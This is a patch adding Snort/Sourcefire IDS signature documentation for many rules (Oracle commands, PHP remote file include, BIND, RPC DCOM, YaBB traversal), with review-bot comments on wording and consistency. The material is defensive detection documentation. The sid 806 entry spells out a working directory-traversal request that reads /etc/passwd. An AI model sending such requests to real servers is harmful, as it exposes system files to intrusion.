+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
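Review bot: Attack Scenarios (`Simple. These are Oracle database commands.`) repeats the Ease of Attack answer instead of describing a scenario; it should say how the command reaches the server (for example over a legitimate client session, or from a shell obtained through an earlier exploit, as Detailed Information already describes). The second Corrective Action line, `Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise`, needs a comma after `session` and a terminating period. The text also never names the command sid 1673 matches, so this file cannot be told apart from the 1697 file later in the patch.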
--- /dev/null
+++ b/doc/signatures/100000636.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000636
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_delete_file.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_delete_file.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
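Review bot: `a CGI application running ona web server` under Detailed Information is a typo for `on a`, and `may indicate that an exploitation attempt has been attempted` in the Summary is redundant (`may indicate an exploitation attempt`). `attackers choosing` needs an apostrophe (`attacker's`) in both Impact and Detailed Information. The `--` separators after the Sid value and after the Affected Systems line are missing the blank line that precedes every other separator in the file.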
--- /dev/null
+++ b/doc/signatures/806.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+
+806
+
+--
+Summary:
+This event is generated when an attempt is made to access a file outside the root directory of a webserver running YaBB.cgi.
+
+
+--
+Impact:
+
+Information disclosure.
+
+--
+Detailed Information:
+
+YaBB.cgi is widely used web-based BBS script. Due to input validation problems in YaBB, a remote attacker can traverse the directory structure and view any files and view any file that a webserver has access to.
+
+This event indicates that a remote attacker has attempted to view a file outside the webservers root directory.
+
+--
+Affected Systems:
+
+YaBB YaBB 9.1.2000
+
+--
+Attack Scenarios:
+
+An attacker issues the following command on port 80 of the webserver:
+
+GET http://target/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00 HTTP/1.0
+
+--
+Ease of Attack:
+
+Simple. No exploit software required.
+
+--
+False Positives:
+
+None known.
+
+--
+False Negatives:
+
+None known.
+
+--
+Corrective Action:
+ 
+Update to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
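Review bot: The Summary refers to `YaBB.cgi` while the Attack Scenarios request targets `/cgi-bin/YaBB.pl`; use the script name the rule actually matches in both places, otherwise an analyst checking web logs will search for the wrong file. Under Detailed Information, `YaBB.cgi is widely used web-based BBS script` is missing `a`, and `view any files and view any file that a webserver has access to` duplicates itself. `YaBB YaBB 9.1.2000` under Affected Systems looks like a copy-paste doubling of the vendor name, and `webservers root directory` needs an apostrophe.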
--- /dev/null
+++ b/doc/signatures/100000116.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+100000116
+
+-- 
+Summary: 
+This event is generated when the PHP-Nuke program's Web_Links module is access 
+with a value for the CID parameter which is not numeric.
+
+-- 
+
+Impact: 
+Sensitive path information may be disclosed, allowing an attacker to conduct 
+reconnaissance against the affected host.
+
+--
+Detailed Information:
+Queries made to PHP-Nuke's Web_Links module which use non-numeric values for 
+the CID parameter will generate an error that discloses sensitive path 
+information about the affected host.
+
+--
+Affected Systems:
+PHP-Nuke 6.0
+PHP-Nuke 6.5
+PHP-Nuke 6.5 RC1
+PHP-Nuke 6.5 RC2
+PHP-Nuke 6.5 RC3
+PHP-Nuke 6.5 BETA 1
+PHP-Nuke 6.5 FINAL
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser.
+-- 
+
+Ease of Attack: 
+Simple, as example exploit URIs exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unsupported fix exists at the URI referenced in the Additional References 
+section. No vendor-supplied patch or workaround exists.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.securityfocus.com/archive/1/321313
+
+--
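Review bot: `is access with a value for the CID parameter` in the Summary should read `is accessed with`. The `--` after `This vulnerability may be exploited with a web browser.` is missing the blank line used before every other separator in the file.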
--- /dev/null
+++ b/doc/signatures/258.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+258
+
+--
+Summary:
+This event is generated when an exploit that targets vulnerabilities in 
+BIND 8.2 and 8.2.1 ("ADM named exploit 8.2/8.2.1") is executed against a
+local DNS server.
+
+--
+Impact:
+Severe. Remote code execution with the privileges of the BIND DNS daemon
+(named). 
+
+--
+Detailed Information:
+BIND is DNS server software shipped with a number of UNIX and 
+Linux-based operating systems. Attackers can exploit multiple 
+vulnerabilities in BIND versions between 8.2 and 8.2.1 to obtain remote 
+shell access. This enables the attacker to execute arbitrary code from 
+the command shell with the security privileges of the BIND DNS daemon 
+(named). If named is running as root, the attacker automatically obtains
+root privileges to the system.
+
+--
+Affected Systems:
+Any operating system running BIND implementations below 8.2.2.
+
+--
+Attack Scenarios:
+An attacker executes an exploit script against a vulnerable server, 
+obtaining shell access to the compromised machine. If named is running 
+as root, the attacker automatically obtains root privileges on the 
+server. Otherwise, the attacker can execute arbitrary code with the 
+privileges of named, which can lead to remote root compromise.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to BIND 8.2.2 or higher.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak (judy.novak@sourcefire.com)
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
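Review bot: `None known` under False Positives lacks the period used in the matching False Negatives entry, and the Judy Novak contributor line uses parentheses around the address where every other contributor line in the patch uses angle brackets. Additional References is empty even though the Summary names a specific exploit (`ADM named exploit 8.2/8.2.1`); a link to the vendor or CERT advisory for the BIND 8.2/8.2.1 issue would let a reader verify the affected-version range and the `8.2.2` fix stated under Corrective Action.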
--- /dev/null
+++ b/doc/signatures/100000465.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000465
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Empris" application running on a webserver. 
+Access to the file "sql_fcnsOLD.php" using a remote file being passed as the 
+"phormationdir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "phormationdir" parameter in the "sql_fcnsOLD.php" 
+script used by the "Empris" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Empris
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
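Review bot: `running ona web server` (typo for `on a`), `exploitation attempt has been attempted` (redundant) and `attackers choosing` (missing apostrophe) recur here exactly as in the other remote-file-include files in this patch; since the Detailed Information text is boilerplate shared across sids, fix it once in the template and regenerate rather than patching each file. The blank line before `--` is missing after the Sid value and after the Affected Systems line.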
--- /dev/null
+++ b/doc/signatures/639.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 639
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+ may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+ may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS357
+
+--
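Review bot: The two lines beginning ` may occur in network packets aimed at overflowing IRIX MIPS network services.` under Detailed Information are stray duplicates of the tail of the preceding sentence and should be deleted. In the paragraph that follows, `application-dependent however, a platform-specific command` needs a semicolon or period before `however`. `Unkown` in the Contributors list is a typo for `Unknown`, and `Simple` under Ease of Attack lacks the period used elsewhere in the file.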
--- /dev/null
+++ b/doc/signatures/100000727.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000727
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Softbiz Banner Exchange" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "city" parameter in the "insertmember.php" script used by the "Softbiz Banner Exchange" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Softbiz Banner Exchange
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
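Review bot: The Impact and Detailed Information text describes a remote-file-include outcome (`Possible execution of arbitrary code of the attackers choosing`, `execute system binaries`), but the Summary says this is a cross site scripting vulnerability via the `city` parameter of `insertmember.php`. The consequence of XSS is script execution in the victim user's browser (session or credential theft, content injection), not code execution on the server, so the Impact and the second Detailed Information paragraph should be rewritten to match or they will mislead anyone triaging the alert. The file also opens with two blank lines before `Rule:` that no other file in the patch has.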
--- /dev/null
+++ b/doc/signatures/111-14.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-14
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected forward
+overlapping packets that may indicate an attempt is being made to evade
+detection by an IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can attempt to hide malicious payload data by sending
+fragmented packets that overlap.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute contain this functionality.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
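Review bot: Attack Scenarios says `sending fragmented packets that overlap`, but stream4 is Snort's TCP stream reassembly preprocessor and the Detailed Information text correctly describes forward overlapping segments; IP fragment overlap is the frag preprocessor's concern, not stream4's. Change the scenario to overlapping TCP segments so the two sections agree, since the distinction decides which preprocessor an operator tunes in response to this event.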
--- /dev/null
+++ b/doc/signatures/1081.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1081
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
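Review bot: Nothing in this file says what request content sid 1081 actually matches; the Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate repeated verbatim for sid 1612 later in this patch, so an analyst reading the alert gets no help deciding what to look for in the web logs. At minimum, name the file or URI pattern the rule is keyed on in the Summary. `attackers choosing` under Impact needs an apostrophe.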
--- /dev/null
+++ b/doc/signatures/1697.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1697
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
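Review bot: This file is a verbatim copy of the 1673 documentation, including the `Simple. These are Oracle database commands.` Attack Scenarios text and the unpunctuated Corrective Action sentence `Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise`. The specific Oracle command each sid matches should be named so the two entries are distinguishable, and Attack Scenarios should describe a scenario rather than repeating the Ease of Attack answer.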
--- /dev/null
+++ b/doc/signatures/2836.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2836
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure relocate_masterdef
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
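Review bot: The last Detailed Information sentence is broken across lines mid-phrase, `vulnerability in the procedure relocate_masterdef` / `. This procedure is included in` / `sys.dbms_repcat_mas.`, leaving a line that begins with a period; rejoin it as one sentence. `Oracle Oracle9i` under Affected Systems doubles the vendor name. `None Known` under False Positives and False Negatives and `Apply the appropriate vendor supplied patch` lack the terminating periods used in the rest of the patch.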
--- /dev/null
+++ b/doc/signatures/3266.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3266
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
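Review bot: `Expoit code exists` under Ease of Attack is a typo for `Exploit`. Attack Scenarios (`a request for a file with an overly long filename via a network share`) does not obviously connect to the `malformed data via RPC` described under Detailed Information; one sentence explaining that the overlong name is carried inside the DCOM request would let the reader reconcile the two sections and understand why the Corrective Action blocks the RPC ports.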
--- /dev/null
+++ b/doc/signatures/3126.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3126
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
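Review bot: `Microsoft Windows Server 2000` under Affected Systems is not a product name; the product is `Windows 2000 Server` (the `Windows Server` naming began with 2003). The stray blank line between `--` and `Corrective Action:` is inconsistent with the other sections of the file.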
--- /dev/null
+++ b/doc/signatures/2644.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2644
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases have a built-in function "from_tz" that is used to
+convert the format of a timestamp. This function contains a programming
+error that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the second parameter
+of the function.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as the value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.nextgenss.com/advisories/ora_from_tz.txt
+
+--
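Review bot: `a Oracle database implementation` in the Summary should be `an Oracle`. Attack Scenarios says `a long string as the value for this command`, but `from_tz` is a function and Detailed Information places the overflow in its second parameter; say `as the second parameter of from_tz` so the two sections agree. `logon` used as a verb should be `log on`. The Affected Systems line is indented with eight spaces where the other files use a tab.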
--- /dev/null
+++ b/doc/signatures/947.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
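Review bot: As with the other generic web-server entries in this patch, the file never states what request pattern sid 947 matches against FrontPage Server Extensions; `Many known vulnerabilities exist ... the attack scenarios are legion` gives an analyst nothing with which to confirm or dismiss the alert. Name the extension or URI the rule keys on. `attackers choosing` under Impact needs an apostrophe.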
--- /dev/null
+++ b/doc/signatures/1612.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1612
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
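Review bot: This file repeats the 1081 documentation word for word, so neither entry identifies what its rule matches; the Summary should name the specific request or file sid 1612 is keyed on. `attackers choosing` under Impact needs an apostrophe.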
--- /dev/null
+++ b/doc/signatures/100000178.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000178
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Hasbani Web server.
+
+-- 
+Impact: 
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the Hasbani web server that may allow an attacker to 
+initiate a DoS condition on the server. Poor programming in the web server may 
+result in the server entering an endless loop when processing malformed GET 
+requests. This can lead to an exhaustion of system resources and a DoS 
+condition.
+
+--
+Affected Systems:
+Hasbani web server 2.0
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed GET request to the web server to cause the 
+DoS. Alternately, exploit code exists for this vulnerability.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exists.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Use Apache.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
